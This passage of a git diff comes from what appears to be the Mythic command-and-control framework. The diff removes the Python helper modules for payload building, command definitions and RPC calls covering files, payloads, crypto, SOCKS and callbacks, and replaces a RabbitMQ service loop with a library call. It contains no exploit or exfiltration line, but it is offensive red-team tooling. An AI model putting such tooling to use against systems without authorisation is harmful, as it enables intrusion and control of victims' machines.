connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() +from mythic_c2_container import mythic_service +mythic_service.start_service_and_heartbeat(debug=False) \ No newline at end of file diff --git a/Example_Payload_Type/Dockerfile b/Example_Payload_Type/Dockerfile index 655b67d1d..f5a84615f 100755 --- a/Example_Payload_Type/Dockerfile +++ b/Example_Payload_Type/Dockerfile @@ -1,2 +1,2 @@ # pull in the appropriate language's payload container from itsafeaturemythic on dockerhub -from itsafeaturemythic/csharp_payload:0.0.6 +from itsafeaturemythic/csharp_payload:0.0.11 diff --git a/Example_Payload_Type/mythic/CommandBase.py b/Example_Payload_Type/mythic/CommandBase.py deleted file mode 100644 index 6e949deb3..000000000 --- a/Example_Payload_Type/mythic/CommandBase.py +++ /dev/null @@ -1,483 +0,0 @@ -from abc import abstractmethod, ABCMeta -import json -from enum import Enum -import base64 -import uuid -from pathlib import Path - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - Completed = "completed" - Processed = "processed" - Processing = "processing" - - -class ParameterType(Enum): - String = "String" - Boolean = "Boolean" - File = "File" - Array = "Array" - ChooseOne = "Choice" - ChooseMultiple = "ChoiceMultiple" - Credential_JSON = "Credential-JSON" - Credential_Account = "Credential-Account" - Credential_Realm = "Credential-Realm" - Credential_Type = ("Credential-Type",) - Credential_Value = "Credential-Credential" - Number = "Number" - Payload = "PayloadList" - ConnectionInfo = "AgentConnect" - - -class CommandParameter: - def __init__( - self, - name: str, - type: ParameterType, - description: str = "", - choices: [any] = None, - required: bool = True, - default_value: any = None, - validation_func: callable = None, - value: any = None, - supported_agents: [str] = None, - ): - self.name = name - self.type = type - self.description = description - if choices is None: - self.choices = [] - else: - self.choices = choices - self.required = required - self.validation_func = validation_func - if value is None: - self.value = default_value - else: - self.value = value - self.default_value = default_value - self.supported_agents = supported_agents if supported_agents is not None else [] - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def type(self): - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def choices(self): - return self._choices - - @choices.setter - def choices(self, choices): - self._choices = choices - - @property - def validation_func(self): - return self._validation_func - - @validation_func.setter - def validation_func(self, validation_func): - self._validation_func = validation_func - - @property - def supported_agents(self): - return self._supported_agents - - @supported_agents.setter - def supported_agents(self, supported_agents): - self._supported_agents = supported_agents - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is not None: - type_validated = TypeValidators().validate(self.type, value) - if self.validation_func is not None: - try: - self.validation_func(type_validated) - self._value = type_validated - except Exception as e: - raise ValueError( - "Failed validation check for parameter {} with value {}".format( - self.name, str(value) - ) - ) - return - else: - # now we do some verification ourselves based on the type - self._value = type_validated - return - self._value = value - - def to_json(self): - return { - "name": self._name, - "type": self._type.value, - "description": self._description, - "choices": "\n".join(self._choices), - "required": self._required, - "default_value": self._value, - "supported_agents": "\n".join(self._supported_agents), - } - - -class TypeValidators: - def validateString(self, val): - return str(val) - - def validateNumber(self, val): - try: - return int(val) - except: - return float(val) - - def validateBoolean(self, val): - if isinstance(val, bool): - return val - else: - raise ValueError("Value isn't bool") - - def validateFile(self, val): - try: # check if the file is actually a file-id - uuid_obj = uuid.UUID(val, version=4) - return str(uuid_obj) - except ValueError: - pass - return base64.b64decode(val) - - def validateArray(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("value isn't array") - - def validateCredentialJSON(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("value ins't a dictionary") - - def validatePass(self, val): - return val - - def validateChooseMultiple(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("Choices aren't in a list") - - def validatePayloadList(self, val): - return str(uuid.UUID(val, version=4)) - - def validateAgentConnect(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("Not instance of dictionary") - - switch = { - "String": validateString, - "Number": validateNumber, - "Boolean": validateBoolean, - "File": validateFile, - "Array": validateArray, - "Credential-JSON": validateCredentialJSON, - "Credential-Account": validatePass, - "Credential-Realm": validatePass, - "Credential-Type": validatePass, - "Credential-Credential": validatePass, - "Choice": validatePass, - "ChoiceMultiple": validateChooseMultiple, - "PayloadList": validatePayloadList, - "AgentConnect": validateAgentConnect, - } - - def validate(self, type: ParameterType, val: any): - return self.switch[type.value](self, val) - - -class TaskArguments(metaclass=ABCMeta): - def __init__(self, command_line: str): - self.command_line = str(command_line) - - @property - def args(self): - return self._args - - @args.setter - def args(self, args): - self._args = args - - def get_arg(self, key: str): - if key in self.args: - return self.args[key].value - else: - return None - - def has_arg(self, key: str) -> bool: - return key in self.args - - def get_commandline(self) -> str: - return self.command_line - - def is_empty(self) -> bool: - return len(self.args) == 0 - - def add_arg(self, key: str, value, type: ParameterType = None): - if key in self.args: - self.args[key].value = value - else: - if type is None: - self.args[key] = CommandParameter( - name=key, type=ParameterType.String, value=value - ) - else: - self.args[key] = CommandParameter(name=key, type=type, value=value) - - def rename_arg(self, old_key: str, new_key: str): - if old_key not in self.args: - raise Exception("{} not a valid parameter".format(old_key)) - self.args[new_key] = self.args.pop(old_key) - - def remove_arg(self, key: str): - self.args.pop(key, None) - - def to_json(self): - temp = [] - for k, v in self.args.items(): - temp.append(v.to_json()) - return temp - - def load_args_from_json_string(self, command_line: str): - temp_dict = json.loads(command_line) - for k, v in temp_dict.items(): - for k2,v2 in self.args.items(): - if v2.name == k: - v2.value = v - - async def verify_required_args_have_values(self): - for k, v in self.args.items(): - if v.value is None: - v.value = v.default_value - if v.required and v.value is None: - raise ValueError("Required arg {} has no value".format(k)) - - def __str__(self): - if len(self.args) > 0: - temp = {} - for k, v in self.args.items(): - if isinstance(v.value, bytes): - temp[k] = base64.b64encode(v.value).decode() - else: - temp[k] = v.value - return json.dumps(temp) - else: - return self.command_line - - @abstractmethod - async def parse_arguments(self): - pass - - -class AgentResponse: - def __init__(self, response: dict): - self.response = response - - -class Callback: - def __init__(self, **kwargs): - self.__dict__.update(kwargs) - - -class BrowserScript: - # if a browserscript is specified as part of a PayloadType, then it's a support script - # if a browserscript is specified as part of a command, then it's for that command - def __init__(self, script_name: str, author: str = None): - self.script_name = script_name - self.author = author - - def to_json(self, base_path: Path): - try: - code_file = ( - base_path - / "mythic" - / "browser_scripts" - / "{}.js".format(self.script_name) - ) - if code_file.exists(): - code = code_file.read_bytes() - code = base64.b64encode(code).decode() - else: - code = "" - return {"script": code, "name": self.script_name, "author": self.author} - except Exception as e: - return {"script": str(e), "name": self.script_name, "author": self.author} - - -class MythicTask: - def __init__( - self, taskinfo: dict, args: TaskArguments, status: MythicStatus = None - ): - self.task_id = taskinfo["id"] - self.original_params = taskinfo["original_params"] - self.completed = taskinfo["completed"] - self.callback = Callback(**taskinfo["callback"]) - self.agent_task_id = taskinfo["agent_task_id"] - self.operator = taskinfo["operator"] - self.args = args - self.status = MythicStatus.Success - if status is not None: - self.status = status - - def get_status(self) -> MythicStatus: - return self.status - - def set_status(self, status: MythicStatus): - self.status = status - - def __str__(self): - return str(self.args) - - -class CommandBase(metaclass=ABCMeta): - def __init__(self, agent_code_path: Path): - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - - @property - @abstractmethod - def cmd(self): - pass - - @property - @abstractmethod - def needs_admin(self): - pass - - @property - @abstractmethod - def help_cmd(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def version(self): - pass - - @property - @abstractmethod - def is_exit(self): - pass - - @property - @abstractmethod - def is_file_browse(self): - pass - - @property - @abstractmethod - def is_process_list(self): - pass - - @property - @abstractmethod - def is_download_file(self): - pass - - @property - @abstractmethod - def is_remove_file(self): - pass - - @property - @abstractmethod - def is_upload_file(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def argument_class(self): - pass - - @property - @abstractmethod - def attackmapping(self): - pass - - @property - def browser_script(self): - pass - - @abstractmethod - async def create_tasking(self, task: MythicTask) -> MythicTask: - pass - - @abstractmethod - async def process_response(self, response: AgentResponse): - pass - - def to_json(self): - params = self.argument_class("").to_json() - if self.browser_script is not None: - bscript = {"browser_script": self.browser_script.to_json(self.base_path)} - else: - bscript = {} - return { - "cmd": self.cmd, - "needs_admin": self.needs_admin, - "help_cmd": self.help_cmd, - "description": self.description, - "version": self.version, - "is_exit": self.is_exit, - "is_file_browse": self.is_file_browse, - "is_process_list": self.is_process_list, - "is_download_file": self.is_download_file, - "is_remove_file": self.is_remove_file, - "is_upload_file": self.is_upload_file, - "author": self.author, - "attack": [{"t_num": a} for a in self.attackmapping], - "parameters": params, - **bscript, - } diff --git a/Example_Payload_Type/mythic/MythicBaseRPC.py b/Example_Payload_Type/mythic/MythicBaseRPC.py deleted file mode 100644 index df92fe802..000000000 --- a/Example_Payload_Type/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,95 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -from CommandBase import * -import json - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self, task: MythicTask): - self.task_id = task.task_id - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/Example_Payload_Type/mythic/MythicC2RPC.py b/Example_Payload_Type/mythic/MythicC2RPC.py deleted file mode 100644 index c43be2875..000000000 --- a/Example_Payload_Type/mythic/MythicC2RPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicC2RPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicC2RPC(MythicBaseRPC): - async def call_c2_func( - self, c2_profile: str, function_name: str, message: str - ) -> MythicC2RPCResponse: - resp = await self.call( - {"action": function_name, "message": message, "task_id": self.task_id}, - c2_profile, - ) - return MythicC2RPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicCryptoRPC.py b/Example_Payload_Type/mythic/MythicCryptoRPC.py deleted file mode 100644 index 6a7673d17..000000000 --- a/Example_Payload_Type/mythic/MythicCryptoRPC.py +++ /dev/null @@ -1,47 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicCryptoRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response["data"] - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCryptoRPC(MythicBaseRPC): - async def encrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "task_id": self.task_id, - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "task_id": self.task_id, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicFileRPC.py b/Example_Payload_Type/mythic/MythicFileRPC.py deleted file mode 100644 index 77388965e..000000000 --- a/Example_Payload_Type/mythic/MythicFileRPC.py +++ /dev/null @@ -1,172 +0,0 @@ -from MythicBaseRPC import * -import base64 -import uuid - - -class MythicFileRPCResponse(RPCResponse): - def __init__(self, file: RPCResponse): - super().__init__(file._raw_resp) - if file.status == MythicStatus.Success: - self.agent_file_id = file.response["agent_file_id"] - self.task = file.response["task"] - self.timestamp = file.response["timestamp"] - self.deleted = file.response["deleted"] - self.operator = file.response["operator"] - self.delete_after_fetch = file.response["delete_after_fetch"] - self.filename = file.response["filename"] - self.md5 = file.response["md5"] - self.sha1 = file.response["sha1"] - self.chunks_received = file.response["chunks_received"] - self.total_chunks = file.response["total_chunks"] - if "contents" in file.response: - self.contents = base64.b64decode(file.response["contents"]) - else: - self.contents = None - else: - self.agent_file_id = None - self.task = None - self.timestamp = None - self.deleted = None - self.operator = None - self.delete_after_fetch = None - self.filename = None - self.md5 = None - self.sha1 = None - self.chunks_received = None - self.total_chunks = None - self.contents = None - - @property - def agent_file_id(self): - return self._agent_file_id - - @agent_file_id.setter - def agent_file_id(self, agent_file_id): - self._agent_file_id = agent_file_id - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def timestamp(self): - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def delete_after_fetch(self): - return self._delete_after_fetch - - @delete_after_fetch.setter - def delete_after_fetch(self, delete_after_fetch): - self._delete_after_fetch = delete_after_fetch - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def md5(self): - return self._md5 - - @md5.setter - def md5(self, md5): - self._md5 = md5 - - @property - def sha1(self): - return self._sha1 - - @sha1.setter - def sha1(self, sha1): - self._sha1 = sha1 - - @property - def chunks_received(self): - return self._chunks_received - - @chunks_received.setter - def chunks_received(self, chunks_received): - self._chunks_received = chunks_received - - @property - def total_chunks(self): - return self._total_chunks - - @total_chunks.setter - def total_chunks(self, total_chunks): - self._total_chunks = total_chunks - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - self._contents = contents - - -class MythicFileRPC(MythicBaseRPC): - async def register_file( - self, - file: bytes, - delete_after_fetch: bool = None, - saved_file_name: str = None, - remote_path: str = None, - is_screenshot: bool = None, - is_download: bool = None, - ) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "register_file", - "file": base64.b64encode(file).decode(), - "delete_after_fetch": delete_after_fetch - if delete_after_fetch is not None - else True, - "saved_file_name": saved_file_name - if saved_file_name is not None - else str(uuid.uuid4()), - "task_id": self.task_id, - "remote_path": remote_path if remote_path is not None else "", - "is_screenshot": is_screenshot if is_screenshot is not None else False, - "is_download": is_download if is_download is not None else False, - } - ) - return MythicFileRPCResponse(resp) - - async def get_file_by_name(self, filename: str) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "get_file_by_name", - "task_id": self.task_id, - "filename": filename, - } - ) - return MythicFileRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicPayloadRPC.py b/Example_Payload_Type/mythic/MythicPayloadRPC.py deleted file mode 100644 index 2af8bb3a1..000000000 --- a/Example_Payload_Type/mythic/MythicPayloadRPC.py +++ /dev/null @@ -1,303 +0,0 @@ -from MythicBaseRPC import * -import base64 -import pathlib - - -class MythicPayloadRPCResponse(RPCResponse): - def __init__(self, payload: RPCResponse): - super().__init__(payload._raw_resp) - if payload.status == MythicStatus.Success: - self.uuid = payload.response["uuid"] - self.tag = payload.response["tag"] - self.operator = payload.response["operator"] - self.creation_time = payload.response["creation_time"] - self.payload_type = payload.response["payload_type"] - self.operation = payload.response["operation"] - self.wrapped_payload = payload.response["wrapped_payload"] - self.deleted = payload.response["deleted"] - self.auto_generated = payload.response["auto_generated"] - self.task = payload.response["task"] - if "contents" in payload.response: - self.contents = payload.response["contents"] - self.build_phase = payload.response["build_phase"] - self.agent_file_id = payload.response["file_id"]["agent_file_id"] - self.filename = payload.response["file_id"]["filename"] - self.c2info = payload.response["c2info"] - self.commands = payload.response["commands"] - self.build_parameters = payload.response["build_parameters"] - else: - self.uuid = None - self.tag = None - self.operator = None - self.creation_time = None - self.payload_type = None - self.operation = None - self.wrapped_payload = None - self.deleted = None - self.auto_generated = None - self.task = None - self.contents = None - self.build_phase = None - self.agent_file_id = None - self.filename = None - self.c2info = None - self.commands = None - self.build_parameters = None - - @property - def uuid(self): - return self._uuid - - @uuid.setter - def uuid(self, uuid): - self._uuid = uuid - - @property - def tag(self): - return self._tag - - @tag.setter - def tag(self, tag): - self._tag = tag - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def creation_time(self): - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def payload_type(self): - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - self._payload_type = payload_type - - @property - def location(self): - return self._location - - @property - def operation(self): - return self._operation - - @operation.setter - def operation(self, operation): - self._operation = operation - - @property - def wrapped_payload(self): - return self._wrapped_payload - - @wrapped_payload.setter - def wrapped_payload(self, wrapped_payload): - self._wrapped_payload = wrapped_payload - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def auto_generated(self): - return self._auto_generated - - @auto_generated.setter - def auto_generated(self, auto_generated): - self._auto_generated = auto_generated - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - try: - self._contents = base64.b64decode(contents) - except: - self._contents = contents - - @property - def build_phase(self): - return self._build_phase - - @build_phase.setter - def build_phase(self, build_phase): - self._build_phase = build_phase - - @property - def c2info(self): - return self._c2info - - @c2info.setter - def c2info(self, c2info): - self._c2info = c2info - - @property - def build_parameters(self): - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - def set_profile_parameter_value(self, - c2_profile: str, - parameter_name: str, - value: any): - if self.c2info is None: - raise Exception("Can't set value when c2 info is None") - for c2 in self.c2info: - if c2["name"] == c2_profile: - c2["parameters"][parameter_name] = value - return - raise Exception("Failed to find c2 name") - - def set_build_parameter_value(self, - parameter_name: str, - value: any): - if self.build_parameters is None: - raise Exception("Can't set value when build parameters are None") - for param in self.build_parameters: - if param["name"] == parameter_name: - param["value"] = value - return - self.build_parameters.append({"name": parameter_name, "value": value}) - - -class MythicPayloadRPC(MythicBaseRPC): - async def get_payload_by_uuid(self, uuid: str) -> MythicPayloadRPCResponse: - resp = await self.call( - {"action": "get_payload_by_uuid", "uuid": uuid, "task_id": self.task_id} - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_template( - self, - uuid: str, - destination_host: str = None, - wrapped_payload: str = None, - description: str = None, - ) -> MythicPayloadRPCResponse: - resp = await self.call( - { - "action": "build_payload_from_template", - "uuid": uuid, - "task_id": self.task_id, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload, - "description": description, - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_parameters(self, - payload_type: str, - c2_profiles: list, - commands: list, - build_parameters: list, - filename: str = None, - tag: str = None, - destination_host: str = None, - wrapped_payload: str = None) -> MythicPayloadRPCResponse: - """ - :param payload_type: String value of a payload type name - :param c2_profiles: List of c2 dictionaries of the form: - { "c2_profile": "HTTP", - "c2_profile_parameters": { - "callback_host": "https://domain.com", - "callback_interval": 20 - } - } - :param filename: String value of the name of the resulting payload - :param tag: Description for the payload for the active callbacks page - :param commands: List of string names for the commands that should be included - :param build_parameters: List of build parameter dictionaries of the form: - { - "name": "version", "value": 4.0 - } - :param destination_host: String name of the host where the payload will go - :param wrapped_payload: If payload_type is a wrapper, wrapped payload UUID - :return: - """ - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": payload_type, - "c2_profiles": c2_profiles, - "filename": filename, - "tag": tag, - "commands": commands, - "build_parameters": build_parameters, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_MythicPayloadRPCResponse(self, - resp: MythicPayloadRPCResponse, - destination_host: str = None) -> MythicPayloadRPCResponse: - c2_list = [] - for c2 in resp.c2info: - c2_list.append({ - "c2_profile": c2["name"], - "c2_profile_parameters": c2["parameters"] - }) - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": resp.payload_type, - "c2_profiles": c2_list, - "filename": resp.filename, - "tag": resp.tag, - "commands": resp.commands, - "build_parameters": resp.build_parameters, - "destination_host": destination_host, - "wrapped_payload": resp.wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def register_payload_on_host(self, - uuid: str, - host: str): - """ - Register a payload on a host for linking purposes - :param uuid: - :param host: - :return: - """ - resp = await self.call( - { - "action": "register_payload_on_host", - "task_id": self.task_id, - "uuid": uuid, - "host": host - } - ) - return MythicPayloadRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicResponseRPC.py b/Example_Payload_Type/mythic/MythicResponseRPC.py deleted file mode 100644 index 8ae588a96..000000000 --- a/Example_Payload_Type/mythic/MythicResponseRPC.py +++ /dev/null @@ -1,43 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicResponseRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - - -class MythicResponseRPC(MythicBaseRPC): - async def user_output(self, user_output: str) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "user_output", - "user_output": user_output, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def update_callback(self, callback_info: dict) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "update_callback", - "callback_info": callback_info, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def register_artifact( - self, artifact_instance: str, artifact_type: str, host: str = None - ) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "register_artifact", - "task_id": self.task_id, - "host": host, - "artifact_instance": artifact_instance, - "artifact": artifact_type, - } - ) - return MythicResponseRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicSocksRPC.py b/Example_Payload_Type/mythic/MythicSocksRPC.py deleted file mode 100644 index 3a1b63df6..000000000 --- a/Example_Payload_Type/mythic/MythicSocksRPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicSocksRPCResponse(RPCResponse): - def __init__(self, socks: RPCResponse): - super().__init__(socks._raw_resp) - - -class MythicSocksRPC(MythicBaseRPC): - async def start_socks(self, port: int) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "task_id": self.task_id, - "start": True, - "port": port, - } - ) - return MythicSocksRPCResponse(resp) - - async def stop_socks(self) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "stop": True, - "task_id": self.task_id, - } - ) - return MythicSocksRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/PayloadBuilder.py b/Example_Payload_Type/mythic/PayloadBuilder.py deleted file mode 100644 index 6333bdbff..000000000 --- a/Example_Payload_Type/mythic/PayloadBuilder.py +++ /dev/null @@ -1,302 +0,0 @@ -from enum import Enum -from abc import abstractmethod -from pathlib import Path -import base64 -from CommandBase import * - - -class BuildStatus(Enum): - Success = "success" - Error = "error" - - -class SupportedOS(Enum): - Windows = "Windows" - MacOS = "macOS" - Linux = "Linux" - WebShell = "WebShell" - Chrome = "Chrome" - - -class BuildParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - - -class BuildParameter: - def __init__( - self, - name: str, - parameter_type: BuildParameterType = None, - description: str = None, - required: bool = None, - verifier_regex: str = None, - default_value: str = None, - choices: [str] = None, - value: any = None, - verifier_func: callable = None, - ): - self.name = name - self.verifier_func = verifier_func - self.parameter_type = ( - parameter_type if parameter_type is not None else ParameterType.String - ) - self.description = description if description is not None else "" - self.required = required if required is not None else True - self.verifier_regex = verifier_regex if verifier_regex is not None else "" - self.default_value = default_value - if value is None: - self.value = default_value - else: - self.value = value - self.choices = choices - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def parameter_type(self): - return self._parameter_type - - @parameter_type.setter - def parameter_type(self, parameter_type): - self._parameter_type = parameter_type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def verifier_regex(self): - return self._verifier_regex - - @verifier_regex.setter - def verifier_regex(self, verifier_regex): - self._verifier_regex = verifier_regex - - @property - def default_value(self): - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is None: - self._value = value - else: - if self.verifier_func is not None: - self.verifier_func(value) - self._value = value - else: - self._value = value - - def to_json(self): - return { - "name": self._name, - "parameter_type": self._parameter_type.value, - "description": self._description, - "required": self._required, - "verifier_regex": self._verifier_regex, - "parameter": self._default_value - if self._parameter_type == BuildParameterType.String - else "\n".join(self.choices), - } - - -class C2ProfileParameters: - def __init__(self, c2profile: dict, parameters: dict = None): - self.parameters = {} - self.c2profile = c2profile - if parameters is not None: - self.parameters = parameters - - def get_parameters_dict(self): - return self.parameters - - def get_c2profile(self): - return self.c2profile - - -class CommandList: - def __init__(self, commands: [str] = None): - self.commands = [] - if commands is not None: - self.commands = commands - - def get_commands(self) -> [str]: - return self.commands - - def remove_command(self, command: str): - self.commands.remove(command) - - def add_command(self, command: str): - for c in self.commands: - if c == command: - return - self.commands.append(command) - - def clear(self): - self.commands = [] - - -class BuildResponse: - def __init__(self, status: BuildStatus, payload: bytes = None, message: str = None): - self.status = status - self.payload = payload if payload is not None else b"" - self.message = message if message is not None else "" - - def get_status(self) -> BuildStatus: - return self.status - - def set_status(self, status: BuildStatus): - self.status = status - - def get_payload(self) -> bytes: - return self.payload - - def set_payload(self, payload: bytes): - self.payload = payload - - def set_message(self, message: str): - self.message = message - - def get_message(self) -> str: - return self.message - - -class PayloadType: - - support_browser_scripts = [] - - def __init__( - self, - uuid: str = None, - agent_code_path: Path = None, - c2info: [C2ProfileParameters] = None, - commands: CommandList = None, - wrapped_payload: str = None, - ): - self.commands = commands - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - self.c2info = c2info - self.uuid = uuid - self.wrapped_payload = wrapped_payload - - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def file_extension(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def 